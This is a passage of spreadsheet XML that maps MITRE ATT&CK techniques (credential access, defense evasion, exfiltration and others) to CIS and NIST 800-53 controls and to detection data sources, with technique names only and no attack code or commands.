    <t>T1552.003</t>
  </si>
  <si>
    <t>Bash History</t>
  </si>
  <si>
    <t>CM-6,CM-7,SC-28,SI-4</t>
  </si>
  <si>
    <t>T1552.004</t>
  </si>
  <si>
    <t>Private Keys</t>
  </si>
  <si>
    <t>3.1,3.11,3.12,3.2,3.3,5.2,5.4,6.1,6.2,6.8,11.3,18.3,18.5</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,AC-2,AC-20,CA-7,CA-8,CM-2,CM-6,IA-2,IA-5,RA-5,SA-11,SA-15,SC-12,SC-28,SC-4,SC-7,SI-12,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1552.005</t>
  </si>
  <si>
    <t>Cloud Instance Metadata API</t>
  </si>
  <si>
    <t>2.3,2.5,4.1,4.2,4.5,4.8,13.4,18.3,18.5,13.10</t>
  </si>
  <si>
    <t>AC-16,AC-20,AC-3,AC-4,CA-7,CM-6,CM-7,IA-3,IA-4,SC-7,SI-10,SI-15,SI-4</t>
  </si>
  <si>
    <t>User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1552.006</t>
  </si>
  <si>
    <t>Group Policy Preferences</t>
  </si>
  <si>
    <t>3.1,3.2,4.1,7.1,7.2,7.3,7.5,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-5,AC-6,CA-8,CM-2,CM-6,IA-2,IA-5,RA-5,SA-11,SA-15,SI-2,SI-4</t>
  </si>
  <si>
    <t>T1552.007</t>
  </si>
  <si>
    <t>Container API</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-23,AC-3,AC-4,AC-5,AC-6,CM-5,CM-6,CM-7,IA-2,SC-46,SC-7,SC-8</t>
  </si>
  <si>
    <t>Command: Command Execution, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1553</t>
  </si>
  <si>
    <t>Subvert Trust Controls</t>
  </si>
  <si>
    <t>2.5,2.6,4.1,4.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-6,CA-8,CM-10,CM-2,CM-3,CM-5,CM-6,CM-7,CM-8,IA-7,IA-9,RA-9,SA-10,SA-11,SC-34,SI-10,SI-2,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1553.001</t>
  </si>
  <si>
    <t>Gatekeeper Bypass</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>T1553.002</t>
  </si>
  <si>
    <t>Code Signing</t>
  </si>
  <si>
    <t>T1553.003</t>
  </si>
  <si>
    <t>SIP and Trust Provider Hijacking</t>
  </si>
  <si>
    <t>2.6,3.3,4.1,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-3,AC-6,CA-7,CM-2,CM-6,CM-7,SI-10,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>File: File Modification, Module: Module Load, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1553.004</t>
  </si>
  <si>
    <t>Install Root Certificate</t>
  </si>
  <si>
    <t>CM-10,CM-6,CM-7,IA-9,SC-20,SI-4</t>
  </si>
  <si>
    <t>T1553.005</t>
  </si>
  <si>
    <t>Mark-of-the-Web Bypass</t>
  </si>
  <si>
    <t>T1553.006</t>
  </si>
  <si>
    <t>Code Signing Policy Modification</t>
  </si>
  <si>
    <t>AC-6,CA-8,CM-3,CM-5,CM-7,CM-8,IA-7,RA-9,SA-10,SA-11,SC-34,SI-2,SI-7</t>
  </si>
  <si>
    <t>T1554</t>
  </si>
  <si>
    <t>Compromise Client Software Binary</t>
  </si>
  <si>
    <t>CA-8,CM-2,CM-6,IA-9,SI-7,SR-11,SR-4,SR-5,SR-6</t>
  </si>
  <si>
    <t>File: File Creation, File: File Deletion, File: File Metadata, File: File Modification</t>
  </si>
  <si>
    <t>T1555</t>
  </si>
  <si>
    <t>Credentials from Password Stores</t>
  </si>
  <si>
    <t>CA-7,IA-5,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Access, Process: Process Creation</t>
  </si>
  <si>
    <t>T1555.001</t>
  </si>
  <si>
    <t>Keychain</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1555.002</t>
  </si>
  <si>
    <t>Securityd Memory</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Access</t>
  </si>
  <si>
    <t>T1555.003</t>
  </si>
  <si>
    <t>Credentials from Web Browsers</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Access</t>
  </si>
  <si>
    <t>T1555.004</t>
  </si>
  <si>
    <t>Windows Credential Manager</t>
  </si>
  <si>
    <t>CM-2,CM-6,CM-7,IA-5,SI-4</t>
  </si>
  <si>
    <t>T1555.005</t>
  </si>
  <si>
    <t>Password Managers</t>
  </si>
  <si>
    <t>CM-2,CM-6,IA-2,IA-5,SI-2,SI-4</t>
  </si>
  <si>
    <t>T1556</t>
  </si>
  <si>
    <t>Modify Authentication Process</t>
  </si>
  <si>
    <t>2.6,4.1,4.7,5.1,5.3,5.4,5.5,6.1,6.2,6.4,6.5,6.8,12.2,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-20,AC-3,AC-5,AC-6,AC-7,CA-7,CM-2,CM-5,CM-6,CM-7,IA-2,IA-5,SC-39,SI-4,SI-7</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</si>
  <si>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Modification</t>
  </si>
  <si>
    <t>T1556.001</t>
  </si>
  <si>
    <t>Domain Controller Authentication</t>
  </si>
  <si>
    <t>2.6,4.1,4.7,5.1,5.3,5.4,5.5,6.1,6.2,6.4,6.5,6.8</t>
  </si>
  <si>
    <t>AC-2,AC-20,AC-3,AC-5,AC-6,AC-7,CA-7,CM-5,CM-6,IA-2,IA-5,SC-39,SI-4,SI-7</t>
  </si>
  <si>
    <t>File: File Modification, Logon Session: Logon Session Creation, Process: OS API Execution, Process: Process Access</t>
  </si>
  <si>
    <t>T1556.002</t>
  </si>
  <si>
    <t>Password Filter DLL</t>
  </si>
  <si>
    <t>File: File Creation, Module: Module Load, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1556.003</t>
  </si>
  <si>
    <t>Pluggable Authentication Modules</t>
  </si>
  <si>
    <t>4.1,4.7,5.3,5.4,6.1,6.2,6.4,6.5,6.8</t>
  </si>
  <si>
    <t>AC-2,AC-20,AC-3,AC-5,AC-6,AC-7,CM-5,CM-6,IA-2,IA-5,SI-4,SI-7</t>
  </si>
  <si>
    <t>File: File Modification, Logon Session: Logon Session Creation</t>
  </si>
  <si>
    <t>T1556.004</t>
  </si>
  <si>
    <t>Network Device Authentication</t>
  </si>
  <si>
    <t>4.1,4.7,5.2,5.3,5.4,6.1,6.2,6.4,6.5,6.8,12.2</t>
  </si>
  <si>
    <t>AC-2,AC-20,AC-3,AC-5,AC-6,AC-7,CM-2,CM-5,CM-6,IA-2,IA-5,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1556.005</t>
  </si>
  <si>
    <t>Reversible Encryption</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Command: Command Execution, Script: Script Execution, User Account: User Account Metadata</t>
  </si>
  <si>
    <t>T1556.006</t>
  </si>
  <si>
    <t>Multi-Factor Authentication</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Logon Session: Logon Session Creation, User Account: User Account Authentication, User Account: User Account Modification</t>
  </si>
  <si>
    <t>T1556.007</t>
  </si>
  <si>
    <t>Hybrid Identity</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, File: File Modification, Logon Session: Logon Session Creation, Module: Module Load</t>
  </si>
  <si>
    <t>T1557</t>
  </si>
  <si>
    <t>Adversary-in-the-Middle</t>
  </si>
  <si>
    <t>3.12,4.1,4.2,4.4,4.6,4.8,7.6,7.7,12.2,12.8,13.3,13.4,13.8,14.2,14.6,16.8,18.2,18.3,18.5,16.10,3.10</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,AC-20,AC-3,AC-4,CA-7,CM-2,CM-6,CM-7,CM-8,RA-5,SC-23,SC-4,SC-46,SC-7,SC-8,SI-10,SI-12,SI-15,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Service: Service Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1557.001</t>
  </si>
  <si>
    <t>LLMNR/NBT-NS Poisoning and SMB Relay</t>
  </si>
  <si>
    <t>3.12,4.1,4.2,4.4,4.5,4.8,7.6,7.7,12.2,12.8,13.3,13.8,16.8,18.2,18.3,18.5</t>
  </si>
  <si>
    <t>AC-3,AC-4,CA-7,CM-2,CM-6,CM-7,CM-8,SC-23,SC-46,SC-7,SC-8,SI-10,SI-15,SI-3,SI-4</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Service: Service Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1557.002</t>
  </si>
  <si>
    <t>ARP Cache Poisoning</t>
  </si>
  <si>
    <t>4.1,4.2,4.4,4.8,7.6,7.7,12.2,13.3,13.8,14.2,14.6,18.2,18.3,18.5,3.10</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,AC-20,AC-3,AC-4,CA-7,CM-2,CM-6,CM-7,CM-8,SC-23,SC-4,SC-7,SC-8,SI-10,SI-12,SI-15,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1557.003</t>
  </si>
  <si>
    <t>DHCP Spoofing</t>
  </si>
  <si>
    <t>T1558</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets</t>
  </si>
  <si>
    <t>4.1,4.7,5.2,5.3,5.4,5.5,6.1,6.2,6.8,18.3,18.5,3.10</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,AC-2,AC-3,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,IA-2,IA-5,SC-4,SI-12,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Credential Request, Command: Command Execution, File: File Access, Logon Session: Logon Session Metadata</t>
  </si>
  <si>
    <t>T1558.001</t>
  </si>
  <si>
    <t>Golden Ticket</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CM-2,CM-5,CM-6,IA-2,IA-5</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Credential Request, Logon Session: Logon Session Metadata</t>
  </si>
  <si>
    <t>T1558.002</t>
  </si>
  <si>
    <t>Silver Ticket</t>
  </si>
  <si>
    <t>4.1,4.7,5.2,5.3,5.4,5.5,6.8,3.10</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Metadata</t>
  </si>
  <si>
    <t>T1558.003</t>
  </si>
  <si>
    <t>Kerberoasting</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Credential Request</t>
  </si>
  <si>
    <t>T1558.004</t>
  </si>
  <si>
    <t>AS-REP Roasting</t>
  </si>
  <si>
    <t>4.1,4.7,5.2,18.3,18.5,3.10</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,AC-2,AC-3,CA-7,CA-8,CM-2,CM-6,IA-2,IA-5,RA-5,SA-11,SA-15,SC-4,SI-12,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1559</t>
  </si>
  <si>
    <t>Inter-Process Communication</t>
  </si>
  <si>
    <t>2.5,2.6,4.1,4.8,13.7,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CM-10,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,RA-5,SC-18,SC-3,SC-7,SI-2,SI-3,SI-4</t>
  </si>
  <si>
    <t>Module: Module Load, Process: Process Access, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1559.001</t>
  </si>
  <si>
    <t>Component Object Model</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CM-2,CM-5,CM-6,IA-2,SC-18,SC-3,SC-7,SI-3</t>
  </si>
  <si>
    <t>Module: Module Load, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1559.002</t>
  </si>
  <si>
    <t>Dynamic Data Exchange</t>
  </si>
  <si>
    <t>AC-4,AC-6,CM-10,CM-2,CM-6,CM-7,CM-8,RA-5,SC-18,SC-3,SC-7,SI-2,SI-3,SI-4</t>
  </si>
  <si>
    <t>T1559.003</t>
  </si>
  <si>
    <t>XPC Services</t>
  </si>
  <si>
    <t>Process: Process Access</t>
  </si>
  <si>
    <t>T1560</t>
  </si>
  <si>
    <t>Archive Collected Data</t>
  </si>
  <si>
    <t>2.1,2.2,2.3,2.4,18.3,18.5</t>
  </si>
  <si>
    <t>CA-8,RA-5,SC-7,SI-3,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1560.001</t>
  </si>
  <si>
    <t>Archive via Utility</t>
  </si>
  <si>
    <t>T1560.002</t>
  </si>
  <si>
    <t>Archive via Library</t>
  </si>
  <si>
    <t>File: File Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1560.003</t>
  </si>
  <si>
    <t>Archive via Custom Method</t>
  </si>
  <si>
    <t>T1561</t>
  </si>
  <si>
    <t>Disk Wipe</t>
  </si>
  <si>
    <t>Command: Command Execution, Drive: Drive Access, Drive: Drive Modification, Driver: Driver Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1561.001</t>
  </si>
  <si>
    <t>Disk Content Wipe</t>
  </si>
  <si>
    <t>T1561.002</t>
  </si>
  <si>
    <t>Disk Structure Wipe</t>
  </si>
  <si>
    <t>T1562</t>
  </si>
  <si>
    <t>Impair Defenses</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CA-8,CM-2,CM-5,CM-6,CM-7,IA-2,IA-4,RA-5,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Disable, Cloud Service: Cloud Service Modification, Command: Command Execution, Driver: Driver Load, Firewall: Firewall Disable, Firewall: Firewall Rule Modification, Process: Process Creation, Process: Process Termination, Script: Script Execution, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1562.001</t>
  </si>
  <si>
    <t>Disable or Modify Tools</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,CM-7,IA-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Driver: Driver Load, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1562.002</t>
  </si>
  <si>
    <t>Disable Windows Event Logging</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, Process: Process Creation, Script: Script Execution, Sensor Health: Host Status, Windows Registry: Windows Registry Key Creation</t>
  </si>
  <si>
    <t>T1562.003</t>
  </si>
  <si>
    <t>Impair Command History Logging</t>
  </si>
  <si>
    <t>CM-2,CM-6,CM-7,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>T1562.004</t>
  </si>
  <si>
    <t>Disable or Modify System Firewall</t>
  </si>
  <si>
    <t>Command: Command Execution, Firewall: Firewall Disable, Firewall: Firewall Rule Modification, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1562.006</t>
  </si>
  <si>
    <t>Indicator Blocking</t>
  </si>
  <si>
    <t>3.3,4.1,4.2,4.7,5.3,5.4,6.1,6.2,6.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CM-10,CM-2,CM-5,CM-6,CM-7,IA-2,IA-9,SC-23,SC-8,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Sensor Health: Host Status, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1562.007</t>
  </si>
  <si>
    <t>Disable or Modify Cloud Firewall</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CM-5,IA-2</t>
  </si>
  <si>
    <t>Firewall: Firewall Disable, Firewall: Firewall Rule Modification</t>
  </si>
  <si>
    <t>T1562.008</t>
  </si>
  <si>
    <t>Disable Cloud Logs</t>
  </si>
  <si>
    <t>3.3,4.7,5.3,5.4,6.1,6.2,6.8,8.1,8.2,8.3</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Disable, Cloud Service: Cloud Service Modification</t>
  </si>
  <si>
    <t>T1562.009</t>
  </si>
  <si>
    <t>Safe Mode Boot</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CM-10,CM-5,CM-6,CM-7,IA-2,IA-9,SC-23,SC-8,SI-7</t>
  </si>
  <si>
    <t>T1562.010</t>
  </si>
  <si>
    <t>Downgrade Attack</t>
  </si>
  <si>
    <t>CM-2,CM-6,RA-5,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Process: Process Metadata</t>
  </si>
  <si>
    <t>T1563</t>
  </si>
  <si>
    <t>Remote Service Session Hijacking</t>
  </si>
  <si>
    <t>2.3,2.5,3.12,4.1,4.2,4.4,4.7,4.8,5.3,6.1,6.2,6.8,7.6,12.2,12.8,18.3,18.5,16.10</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-4,AC-5,AC-6,CA-8,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,IA-4,IA-6,RA-5,SC-46,SC-7,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, Logon Session: Logon Session Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1563.001</t>
  </si>
  <si>
    <t>SSH Hijacking</t>
  </si>
  <si>
    <t>2.3,2.5,4.1,4.7,4.8,5.2,5.3,6.1,6.2,6.8,7.7,18.3,18.5,16.10</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,IA-5,RA-5,SC-12,SC-23,SI-4</t>
  </si>
  <si>
    <t>T1563.002</t>
  </si>
  <si>
    <t>RDP Hijacking</t>
  </si>
  <si>
    <t>2.3,2.5,3.12,4.1,4.2,4.4,4.7,4.8,5.1,5.3,5.5,6.1,6.2,6.8,7.6,12.2,12.7,12.8,13.5,18.3,18.5,13.10,16.10</t>
  </si>
  <si>
    <t>AC-11,AC-12,AC-17,AC-2,AC-3,AC-4,AC-5,AC-6,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,RA-5,SC-46,SC-7,SI-4</t>
  </si>
  <si>
    <t>T1564</t>
  </si>
  <si>
    <t>Hide Artifacts</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</si>
  <si>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</si>
  <si>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T1564.001</t>
  </si>
  <si>
    <t>Hidden Files and Directories</t>
  </si>
  <si>
    <t>T1564.002</t>
  </si>
  <si>
    <t>Hidden Users</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1564.003</t>
  </si>
  <si>
    <t>Hidden Window</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1564.004</t>
  </si>
  <si>
    <t>NTFS File Attributes</t>
  </si>
  <si>
    <t>AC-16,AC-3,CA-7,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1564.005</t>
  </si>
  <si>
    <t>Hidden File System</t>
  </si>
  <si>
    <t>File: File Modification, Firmware: Firmware Modification, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1564.006</t>
  </si>
  <si>
    <t>Run Virtual Instance</t>
  </si>
  <si>
    <t>2.3,2.5,4.1,4.8,7.7,18.3,18.5</t>
  </si>
  <si>
    <t>CM-2,CM-6,CM-7,CM-8,SI-10,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Image: Image Metadata, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1564.007</t>
  </si>
  <si>
    <t>VBA Stomping</t>
  </si>
  <si>
    <t>CM-2,CM-6,CM-8,SI-4</t>
  </si>
  <si>
    <t>File: File Metadata, Script: Script Execution</t>
  </si>
  <si>
    <t>T1564.008</t>
  </si>
  <si>
    <t>Email Hiding Rules</t>
  </si>
  <si>
    <t>AC-4,CM-3,CM-5,CM-7,IR-5,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, File: File Modification</t>
  </si>
  <si>
    <t>T1564.009</t>
  </si>
  <si>
    <t>Resource Forking</t>
  </si>
  <si>
    <t>CM-11,CM-2,CM-6,CM-7,SA-10,SC-4,SC-44,SC-6,SI-10,SI-15,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1564.010</t>
  </si>
  <si>
    <t>Process Argument Spoofing</t>
  </si>
  <si>
    <t>Process: Process Creation</t>
  </si>
  <si>
    <t>T1565</t>
  </si>
  <si>
    <t>Data Manipulation</t>
  </si>
  <si>
    <t>3.11,3.12,3.3,4.4,6.1,6.2,6.8,11.1,11.2,11.3,11.4,11.5,12.2,12.8,16.8,3.10</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,AC-20,AC-3,AC-4,CA-7,CM-2,CM-6,CM-7,CM-8,CP-10,CP-6,CP-7,CP-9,SC-28,SC-36,SC-4,SC-46,SC-7,SI-12,SI-16,SI-23,SI-4,SI-7</t>
  </si>
  <si>
    <t>File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1565.001</t>
  </si>
  <si>
    <t>Stored Data Manipulation</t>
  </si>
  <si>
    <t>3.11,3.12,3.3,6.1,6.2,6.8,8.9,11.1,11.2,11.3,11.4,11.5,12.8</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,AC-20,AC-3,CA-7,CM-2,CM-6,CM-8,CP-10,CP-6,CP-7,CP-9,SC-28,SC-36,SC-4,SC-7,SI-12,SI-16,SI-23,SI-4,SI-7</t>
  </si>
  <si>
    <t>File: File Creation, File: File Deletion, File: File Modification</t>
  </si>
  <si>
    <t>T1565.002</t>
  </si>
  <si>
    <t>Transmitted Data Manipulation</t>
  </si>
  <si>
    <t>11.3,3.10</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,AC-20,CM-2,CM-6,CM-8,SC-4,SI-12,SI-4,SI-7</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1565.003</t>
  </si>
  <si>
    <t>Runtime Data Manipulation</t>
  </si>
  <si>
    <t>3.12,3.3,4.4,5.4,6.1,6.2,6.8,11.3,11.4,12.2,12.8,16.8</t>
  </si>
  <si>
    <t>AC-3,AC-4,CA-7,CM-6,CM-7,CP-9,SC-28,SC-4,SC-46,SC-7,SI-16,SI-4</t>
  </si>
  <si>
    <t>File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1566</t>
  </si>
  <si>
    <t>Phishing</t>
  </si>
  <si>
    <t>2.3,2.7,9.3,9.6,13.3,13.8,14.1,14.2,14.6</t>
  </si>
  <si>
    <t>AC-4,CA-7,CM-2,CM-6,IA-9,SC-20,SC-44,SC-7,SI-2,SI-3,SI-4,SI-8</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, File: File Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1566.001</t>
  </si>
  <si>
    <t>Spearphishing Attachment</t>
  </si>
  <si>
    <t>T1566.002</t>
  </si>
  <si>
    <t>Spearphishing Link</t>
  </si>
  <si>
    <t>2.3,9.3,14.1,14.2,14.6</t>
  </si>
  <si>
    <t>AC-4,CA-7,CM-2,CM-6,IA-9,SC-20,SC-44,SC-7,SI-3,SI-4,SI-8</t>
  </si>
  <si>
    <t>T1566.003</t>
  </si>
  <si>
    <t>Spearphishing via Service</t>
  </si>
  <si>
    <t>2.3,2.5,9.3,14.1,14.2,14.6</t>
  </si>
  <si>
    <t>AC-4,CA-7,SC-44,SC-7,SI-2,SI-3,SI-4,SI-8</t>
  </si>
  <si>
    <t>T1567</t>
  </si>
  <si>
    <t>Exfiltration Over Web Service</t>
  </si>
  <si>
    <t>2.3,2.5,9.3</t>
  </si>
  <si>
    <t>AC-16,AC-2,AC-20,AC-23,AC-3,AC-4,AC-6,CA-3,CA-7,SA-8,SA-9,SC-28,SC-31,SC-7,SI-3,SI-4,SR-4</t>
  </si>
  <si>
    <t>T1567.001</t>
  </si>
  <si>
    <t>Exfiltration to Code Repository</t>
  </si>
  <si>
    <t>AC-20,AC-4,SC-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1567.002</t>
  </si>
  <si>
    <t>Exfiltration to Cloud Storage</t>
  </si>
  <si>
    <t>T1568</t>
  </si>
  <si>
    <t>Dynamic Resolution</t>
  </si>
  <si>
    <t>9.2,13.3,13.8</t>
  </si>
  <si>
    <t>AC-4,CA-7,SC-20,SC-21,SC-22,SC-7,SI-3,SI-4</t>
  </si>
  <si>
    <t>T1568.001</t>
  </si>
  <si>
    <t>Fast Flux DNS</t>
  </si>
  <si>
    <t>T1568.002</t>
  </si>
  <si>
    <t>Domain Generation Algorithms</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1568.003</t>
  </si>
  <si>
    <t>DNS Calculation</t>
  </si>
  <si>
    <t>T1569</t>
  </si>
  <si>
    <t>System Services</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CM-11,CM-2,CM-5,CM-6,CM-7,IA-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1569.001</t>
  </si>
  <si>
    <t>Launchctl</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CM-11,CM-5,IA-2</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Service: Service Creation</t>
  </si>
  <si>
    <t>T1569.002</t>
  </si>
  <si>
    <t>Service Execution</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1570</t>
  </si>
  <si>
    <t>Lateral Tool Transfer</t>
  </si>
  <si>
    <t>4.2,4.4,4.5,7.6,7.7,13.3,13.4,13.8,18.2,18.3</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Metadata, Named Pipe: Named Pipe Metadata, Network Share: Network Share Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1571</t>
  </si>
  <si>
    <t>Non-Standard Port</t>
  </si>
  <si>
    <t>4.2,4.4,12.2,12.8,13.3,13.8</t>
  </si>
  <si>
    <t>T1572</t>
  </si>
  <si>
    <t>Protocol Tunneling</t>
  </si>
  <si>
    <t>4.2,4.4,7.7,9.3,13.3,13.4,13.8</t>
  </si>
  <si>
    <t>T1573</t>
  </si>
  <si>
    <t>Encrypted Channel</t>
  </si>
  <si>
    <t>AC-4,CA-7,CM-2,CM-6,CM-7,SC-12,SC-16,SC-23,SC-7,SI-3,SI-4</t>
  </si>
  <si>
    <t>T1573.001</t>
  </si>
  <si>
    <t>Symmetric Cryptography</t>
  </si>
  <si>
    <t>T1573.002</t>
  </si>
  <si>
    <t>Asymmetric Cryptography</t>
  </si>
  <si>
    <t>T1574</t>
  </si>
  <si>
    <t>Hijack Execution Flow</t>
  </si>
  <si>
    <t>2.5,2.6,4.1,4.7,5.3,5.4,6.1,6.2,6.8,7.1,7.2,7.3,7.4,7.5,16.13,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CA-7,CA-8,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,RA-5,SI-10,SI-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Service: Service Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1574.001</t>
  </si>
  <si>
    <t>DLL Search Order Hijacking</t>
  </si>
  <si>
    <t>2.5,2.6,4.1,16.13,18.3,18.5</t>
  </si>
  <si>
    <t>CA-8,CM-2,CM-6,CM-7,RA-5,SI-10,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Module: Module Load</t>
  </si>
  <si>
